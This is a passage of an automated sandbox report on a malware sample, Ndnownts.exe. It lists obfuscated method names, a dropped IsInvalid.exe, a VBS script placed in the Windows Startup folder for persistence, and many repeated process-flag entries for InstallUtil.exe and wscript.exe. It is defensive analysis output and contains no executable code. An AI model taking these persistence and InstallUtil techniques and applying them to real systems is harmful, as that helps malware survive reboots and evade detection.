                Source: 0.2.Ndnownts.exe.3671b78.5.raw.unpack, lk5WHIuzXuogCo8yA2Z.csHigh entropy of concatenated method names: 'DRR5ci0MfW', 'y5N5X7GAWM', 'DJ25UqMS1Y', 'fmA5EIVX5n', 't5L5f7ryBf', 'y9w52BXrix', 'y7j5jeJZeM', 'J6Qg1eCX7D', 'ghw5sWQYmY', 'RvV53RexRq'
                Source: 0.2.Ndnownts.exe.3671b78.5.raw.unpack, tilDvqDFLNhXNLqYPJa.csHigh entropy of concatenated method names: 'hlhN3tILIaE9fVoJNP3', 'LhxQ8SIG43Y5Q9gcWiy', 'zyZuuLcaPP', 'LYuhHaIkitQ5bHcXmQg', 'd9E5OBISylgIxGXaR0o', 'TUJ3b1IdwqodWd4r4Ei', 'h9wryZIxlZp2MIMHNk4', 'isgupWIWToscKsSiZBv', 'rACXUuIMcXiyWyJdOBb', 'UMoIMOIz1HsCY1v2Mx6'
                Source: 0.2.Ndnownts.exe.3671b78.5.raw.unpack, lyQrY3uJGV8eyfUF6Xt.csHigh entropy of concatenated method names: 'tKwuGSZB6o', 'XReuPTW2IW', 'OM0uTuLDYD', 'TmTupp4pns', 'WuXuk75uEp', 'januSBMoP4', 'zkGudymMgN', 'LwTuxiSAWh', 'awbuWQRpcd', 'KCmuMJuMOn'
                Source: 0.2.Ndnownts.exe.3671b78.5.raw.unpack, yZ5DTODoaWNn3wVHvWH.csHigh entropy of concatenated method names: 'CRhDBvXGgK', 'bAJDR70TIc', 'Ke5iWiaaKiGvkObYZaV', 'LxxSGraI1rxsONOkX0d', 'GosdvGaQtvmiBu6BDRt', 'b2xpuAawUJqUbifQ5It', 'kw0Ijuar7fEmBJkHSc7', 'c2Wfc0aAP22597EUuVj', 'z0JHB0aeXYIoGby5xcB', 'wI1LWbaVjGFYUbWi9Rl'
                Source: 0.2.Ndnownts.exe.3671b78.5.raw.unpack, GQO1cou3Yh7d1ImCQPc.csHigh entropy of concatenated method names: 'XdUVDkNZgJ', 'S44VOZJ9Bn', 'FKPQKSQo0WGAaYntAYY', 'GlpdAoQ5aPXm04pxGbs', 'nMj8FfQBaAjKUTqnAQu', 'Xe181FQRi9y9df3VCZU', 'UxvLcvQZQenT4tJexs2', 'tKt6KXQ6GaZxy3Djl5g'
                Source: C:\Users\user\Desktop\Ndnownts.exeFile created: C:\Users\user\AppData\Roaming\IsInvalid.exeJump to dropped file

                Boot Survival

                barindex
                Drops VBS files to the startup folder
                Source: C:\Users\user\Desktop\Ndnownts.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsInvalid.vbsJump to dropped file
                Source: C:\Users\user\Desktop\Ndnownts.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsInvalid.vbsJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsInvalid.vbsJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
